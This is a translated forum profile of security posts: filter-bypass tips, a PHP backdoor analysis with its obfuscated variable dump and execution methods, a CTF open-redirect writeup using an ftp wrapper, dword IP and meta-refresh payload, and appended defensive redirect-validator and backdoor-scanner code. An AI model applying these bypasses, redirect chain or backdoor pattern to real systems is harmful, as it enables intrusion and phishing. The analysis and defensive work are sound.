mah_one

Active Members
  • Posts: 422
  • Days Won: 5

mah_one last won the day on April 28 2014

  1. #samibap**a So I didn't think there was another level beyond the one set by "Team Code"!
  2. I wouldn't try that. The rate at which you find them goes up, but you're already scanning and that's kind of illegal.
  3. What they showed you above is valid, but only partially... The problem is that not all proxies set that X-Forwarded-For parameter, etc. And if you don't have those parameters, there is no way to be sure whether an IP is a proxy or not! But you can tell if someone is using a particular proxy, for example "server1.kproxy.com", the one you gave.
  4. Yes, but they probably have a blacklist, and for %25%30%30 they catch it, but for %%30%30 they don't :D
  5. Seccon just ended and there was a task there that resembles this one (there's a writeup). You have to end up with a QR code and scan it. Of course, that's the easiest part.
  6. I think an upload could be done with that vulnerability; I hope he will tell the Google folks to reconsider the issue and treat it as an RCE...
  7. It's the same problem; maybe they fixed it and then reverted to what they had before... Something like that happened with Facebook too.
  8. "I don't understand. You have an XSS on the www . paypal . com domain, I see no reason why you couldn't use it to make payments, but you describe the risk as a "reflected file download" or "open redirect"? Come on... seriously?" -->> he meant that you can't do anything without user interaction; I think it needs to be rephrased a bit... I found it while I was at work (they let me hunt, but on the condition that they publish it, which seems fair to me...). As for the problem, it wasn't just XSS; the idea is that you could manipulate the ciphertext so that it returned exe files or another extension...
  9. Done! Read above...
  10. Don't send it unencrypted. Make an archive, put a password on it and send it by PM to Che. He will help you, guaranteed.
  11. As for manual or automatic, I can't tell you. Given how small it is, I could do it manually, but rather than doing it manually I'd rather build something automatic so I don't have to struggle with it a second time.
  12. I looked at the code last night... It's a backdoor and nothing more! I dumped the variables: [fOnyYqpwzsk] => D@ [Zd8_Y] => swro}u [lX] => ml= [WKlp] => O 4SK+ [X8] => CLV@;- [OtA] => 6-%/IY [Blc] => csse}_gyll [eI6dnDa] => }vvky_no}~ [HqtJnJ] => gvuute_nuns|oon [FiFo8Ahhl] => c{gk}u_vungvioo [xqrzKk] => 5edd955dda36ed6a2a3ac67de0c01d [wuzqhZOqm9m] => /e [y9Y] => 1255639 [T1_] => 9 [vYUf] => HTT [Fy] => P_ [FBM] => A [JU0_r] => b7 [r6g] => a [AZWsev] => mh [j6BbT5ea] => F [i4148QjXMMi] => bMvF [hg8l] => HTTP_X_DEVICE_USER_A [IT] => GEN [Q4M] => T [VZjjeswS] => strcmp [by] => md5 [KJQOFrw] => getenv [Z82] => preg_replace [R18uq] => uasort [sGn_zAlOrfM] => array_fill [u0sX] => create_function Then it gets to if(strcmp(md5(getenv(HTTP_A)),'5edd955dda36ed6a2a3ac67de0c01d')) There it checks the password, which it takes from the "A" header. If the password is good, it does a preg_replace on the user-supplied data using -> "/e" (that is a backdoor). If you don't have preg_replace, it then tries a create_function with the data from "HTTP_X_DEVICE_USER_AGENT". Basically he left himself 3 methods of executing PHP code: preg_replace, uasort -> using a callback function, create_function
  13. I know that around 2000 - 2003 you would call a number: 080080808; there were several combinations. After dialing that number you'd start whistling loudly until you got the tone, and then you'd call whatever number you wanted (I don't know whether it was a reverse-charge call or the call was free...).
  14. There are other ways to solve that challenge; like Stealth said in the reply above, there is a way to inject \r\n. That challenge is very easy, easier than I or Stealth explained. Keep looking, the easiest solution hasn't been spoiled so far.
  15. I will start with Level 13. At Level 13 I have to redirect the user to another website using the URL: http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=ex13-task.php //Edited The problem is that you can't use "http://" at the beginning of the value you send to the "redirect" parameter. Most probably there is a blacklist and I have to bypass it. There is a quick solution to bypass this inconvenience, but I will let others think about it. I chose to explain a method to redirect anyone to anything using the ftp wrapper. After several attempts to bypass the mechanism that prevents me from using certain words, I managed to find that I can use the "ftp" wrapper. So here's my writeup. If I load the link: http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=ftp://attackerwebsite.com/file the web application redirects me to ftp://attackerwebsite.com/file. From the ftp page I have to make another redirect to a web server, "http://attackerwebsite.com/". To do this I used a script written in Python to emulate an ftp server; for any request to the ftp server the script will always return the same file, without authentication. Start the python script: Having the ftp server up, the question is what should I return to the victim's browser? On a page that loads an ftp file, the browser will not execute javascript like <script>JAVASCRIPT CODE THAT REDIRECTS THE VICTIM ON ANOTHER PAGE</script>, but it will interpret html tags.
      To make another redirection from the ftp page to attackerwebsite.com I have to use the following html code inside the '/tmp/test' file: <html><meta http-equiv="refresh" content="0;URL='http://attackerwebsite.com/'" /></html> Having everything ready, let's try to make a redirection to https://attackerwebsite.com/ Load the following link in a tab: http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=ftp://1758432401/file ftp://1758432401/file is the same as http://104.207.140.145/ (dword representation). My python script responded with the file located in '/tmp/test': "[i 15-06-24 07:46:38] x.x.104.6:20970-[anonymous] RETR /tmp/test completed=1 bytes=301 seconds=0.002" In the browser the html code <html><meta http-equiv="refresh" content="0;URL='http://attackerwebsite.com/'" /></html> redirected me to attackerwebsite.com
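As an added example (my own code, not the post's Python FTP script or the CTF's server code): the server-side side of post 15. A blacklist on "http://" lets the ftp wrapper and a dword-encoded host through; an allowlist that accepts only a local relative path does not. The function names are mine, and the dword decoder reproduces the 1758432401 = 104.207.140.145 mapping from the post so the real redirect target can be read out of access logs.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit


def blacklist_check(value: str) -> bool:
    """The weak check the writeup describes: refuse only values starting with http://."""
    return not value.lower().startswith("http://")


def allowlist_check(value: str) -> bool:
    """Accept only a local relative path: no scheme, no authority, no stream wrappers.

    Rejects ftp://, https://, javascript:, protocol-relative //host, backslash
    variants and CR/LF (which would otherwise land in the Location header).
    """
    value = unquote(value)  # normalise %2f%2f etc. before looking at the structure
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return False
    if value.startswith(("//", "/\\", "\\")):
        return False
    if "\r" in value or "\n" in value:
        return False
    # Only plain path characters plus an optional query string.
    return re.fullmatch(r"[A-Za-z0-9_./-]*(\?[^\s]*)?", value) is not None


def dword_to_ip(host: str) -> str:
    """Decode a 'dword' host such as 1758432401 back to dotted form for log review."""
    if host.isdigit() and int(host) < 2**32:
        return str(ipaddress.IPv4Address(int(host)))
    return host


def redirect_target_host(value: str) -> str:
    """Host a ?redirect= value would actually send the browser to, in dotted form."""
    return dword_to_ip(urlsplit(unquote(value)).hostname or "")
```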
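As a second added example (my own code, not the sample analysed in post 12): a static check for the three PHP code-execution primitives that post names. Because the sample hid the function names in string variables, the scanner first resolves `$var(` calls from simple string assignments, the way the variable dump did, and only then looks for preg_replace with the /e modifier, create_function, uasort with a variable callback, and the strcmp/md5/getenv password gate. SAMPLE_PHP is a constructed snippet that imitates the structure described in the post, not the real file.

```python
import re

# Constructed PHP snippet in the style post 12 describes: function names stored in
# variables, a header-based password gate, then three ways to run user-supplied code.
SAMPLE_PHP = r"""<?php
$a='strcmp'; $b='md5'; $c='getenv'; $d='preg_replace'; $e='create_function';
$h='5edd955dda36ed6a2a3ac67de0c01d';
if($a($b($c('HTTP_A')),$h)) { exit; }
$d('/.*/e', $c('HTTP_X_DEVICE_USER_AGENT'), '');
$cb=$e('', $c('HTTP_X_DEVICE_USER_AGENT'));
uasort($data, $cb);
"""

ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")


def resolve_variable_calls(php: str) -> str:
    """Replace $var(...) with the string literal assigned to $var (a static variable dump)."""
    table = dict(ASSIGN.findall(php))
    return re.sub(r"\$(\w+)\s*\(", lambda m: table.get(m.group(1), "$" + m.group(1)) + "(", php)


def has_eval_modifier(pattern: str) -> bool:
    """True if a PCRE pattern string carries the /e modifier (replacement evaluated as PHP)."""
    delim = pattern[0]
    close = {"(": ")", "{": "}", "[": "]", "<": ">"}.get(delim, delim)
    return "e" in pattern[pattern.rfind(close) + 1:]


def scan(php: str) -> list:
    """Return the names of the backdoor indicators found after resolving variable calls."""
    src = resolve_variable_calls(php)
    hits = []
    for m in re.finditer(r"preg_replace\s*\(\s*['\"]([^'\"]+)['\"]", src):
        if has_eval_modifier(m.group(1)):
            hits.append("preg_replace with /e modifier")
    if re.search(r"create_function\s*\(", src):
        hits.append("create_function")
    if re.search(r"uasort\s*\([^,]+,\s*\$\w+\s*\)", src):
        hits.append("uasort with variable callback")
    if re.search(r"strcmp\s*\(\s*md5\s*\(\s*getenv\s*\(", src):
        hits.append("md5 password gate on a request header")
    return hits
```

Without the resolution step none of the literal names appear in the source, which is exactly why the poster needed a variable dump before reading the logic.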